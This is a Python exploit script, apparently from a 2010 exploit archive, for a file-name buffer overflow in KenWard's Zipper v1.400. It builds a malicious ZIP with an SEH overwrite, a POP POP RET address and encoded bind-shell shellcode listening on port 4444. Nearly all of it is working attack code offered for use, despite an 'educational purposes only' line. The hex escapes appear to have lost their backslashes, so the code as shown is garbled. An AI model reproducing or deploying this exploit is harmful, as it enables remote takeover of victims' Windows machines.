KenWard's Zipper v1.400 Buffer Overflow - Method 2
Posted on 25 March 2010
================================================== KenWard's Zipper v1.400 Buffer Overflow - Method 2 ================================================== #!/usr/bin/python ## KenWard's Zipper v1.400 File Name Buffer Overflow ## Coded by sinn3r (x90.sinner{at}gmail{d0t}com) ## Tested on: Windows XP SP3 ENG ## Reference: http://www.exploit-db.com/exploits/11834 ## Big thanks to mr_me, and corelanc0d3r. ## greetz to all the friends at Corelan Scurity Team & Exploit-DB... coolest people ever! ## ## Description: ## This exploit takes advantage of the fact too many characters get mangled, as a result ## I was able to get a shell in a more straight forward way. Very interesting exercise. ## Mr_me and tecR0c figured out this trick, of course. But I was given the honor to share it. ## Script provided 'as is', without any warranty. ## Use for educational purposes only. Do not use this code to do anything illegal. ## Zip file format based on: ## http://en.wikipedia.org/wiki/ZIP_(file_format) local_file_header = ( "x50x4Bx03x04" #Local file header signature "x00x02" #Version needed to extract "x00x08" #General purpose bit flag "x00xDA" #Compression method "xA2x48" #File last modification time "x3BxF6" #File last modification date "x66x18x0Dx4E" #CRC-32 "xEFx0Fx00x00" #Compressed size (payload size) "x14x00x00x00" #Uncompressed size "xe4x4f" #File name length "x04x00" #Extra field length #"x73x65x63x72x65x74x73" #File name (n) ASCII "secrets" #"x42x42x42x42" #Extra field (m) ); central_directory_file_header = ( "x50x4bx01x02" #Central directory file header signature "x14x00" #Version made by "x14x00" #Version needed to extract "x00x08" #General purpose bit flag "x00xDA" #Compression method "xA2x48" #File last modification time "x3BxF6" #File last modification date "x66x18x0Dx4E" #CRC-32 "xE4x0Fx00x00" #Compressed size (payload size) "x14x00x00x00" #Uncompressed size "xe4x0f" #File name length (n) "x04x00" #Extra field length (m) "x04x00" #File comment length "x00x01" #Disk number where file starts "x00x00" #Internal file attributes "x20x00x00x00" #External file attributes "x00x00x00x00" #Relative offset of local file header #"x73x65x63x72x65x74x73" #File name (n) ASCII "secrets" #"x42x42x42x42" #Extra field (m) #"x43x43x43x43" #File comment (k) ); end_of_central_directory_record = ( "x50x4Bx05x06" #End of central directory signature "x00x00" #Number of this disk "x00x00" #Disk where central directory starts "x01x00" #Number of central directory records on this disk "x01x00" #Total number of central directory records "x12x10x00x00" #Size of central directory (central directory size + payload) "x02x10x00x00" #Offset of start of central directory, relative to start of archive (lfh + payload) "x00x00" #Zip file comment length (n) ); ## Align EAX for the base address of the alpha2 encoded bindshell alignEAX = ( "x05x10x7Ex10x7E" #ADD EAX, 0x7E107E10 "x05x09x75x01x7E" #ADD EAX, 0x7E017509 "x05x02x03x01x04" #ADD EAX, 0x04010302 "x72x07"+ #JB jump over the bytes we can't overwrite "x41"*12 #NOPs ); ## windows/shell_bind_tcp lport=4444 exitfunc=seh ## alpha2 eax --uppercase 744 bytes shellcode = ("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHMYEP5PS03PK" "9ZE6QN2CTLK0RVPLKPR4LLKQBTTLKSBVH4ONWQZVFFQKOFQO0NLGL3QSL4BVLQ0YQXO4MUQIWKRJPF2QGLKPRB0" "LKPBGLEQ8PLK70RXMUO0BTQZEQHPPPLK78TXLK687PS1XSM37LPILKWDLKUQ8V6QKO6QYPNL9Q8OTMEQ9WFXKPT" "5ZT33SMJX7KCM14CEZB1HLKPXWTUQN3SVLKTLPKLKV85LEQXSLK34LKS1HPK9W47TQ4QK1KSQQI0Z0QKOM0PXQO" "QJLKTRJKK61MSXVS02EP5PCXBW3CFRQOF4SXPLT77VDGKO9EX8LPS1UPS0WYO4F4PP3X7YMP2KS0KOHUV00P0P6" "0QPV01PPPRHJJTOIOKPKON5MYO7FQYK0SSXS2S0TQQLMYKVSZB0PVPW3XO2YK7GCWKO8UPSPWE8X7KYWHKOKOHU" "QCV3PWSX2TJLGKKQKON5V7MYHG58BU2N0M3QKON52HRCBM54UPMYKS0W67676QL62JTRPYPVKRKMSVO774WTWLU" "QUQLM0DGTB0O65PPD0TV0PV0V0VQVPVPNPV1FQC66SXT9XLWOLFKOYEK9M0PNV6QVKOFPCXUXK75MSPKON5OKKN" "TNP2ZJBHY6LUOMMMKON5WLUV3L5ZK0KKKPRUC5OKW74S2R2ORJ5PPSKO8UUZA") ## 4064+4 bytes ## Pointer to next SEH record: 1022 bytes ## SE handler : 1026 bytes payload = ( "x41"*(1017-len(alignEAX)-len(shellcode))+ #Padding alignEAX+ #Align EAX for the bindshell shellcode+ #Bindshell lport 4444 "x82x85x81x98x98" #This will get mangled and become "xE9xE0xFCxFFxFF" "x73x97x42x42" #JNB 0x97 = JNB 0xF9 = Same as EB 0xFB = Rewind 5 bytes "x7Ex27x41x00"+ #POP POP RET = 0x0041277E "x44"*3034+ #Padding ".bin" #Fake name ); ## Create the ZIP structure with our payload zip = ( local_file_header + payload + central_directory_file_header + payload + end_of_central_directory_record ); f = open("sploit.zip", "w") f.write(zip) f.close() print "[*] Local file header size = 0x%x" %len(local_file_header) print "[*] Central directory file header size = 0x%x" %len(central_directory_file_header) print "[*] End of central directory record size = 0x%x" %len(end_of_central_directory_record) print "[*] Payload size = %s bytes" %len(payload) print "[*] sploit.zip created. Open it with KenWard's Zipper." # Inj3ct0r.com [2010-03-25]
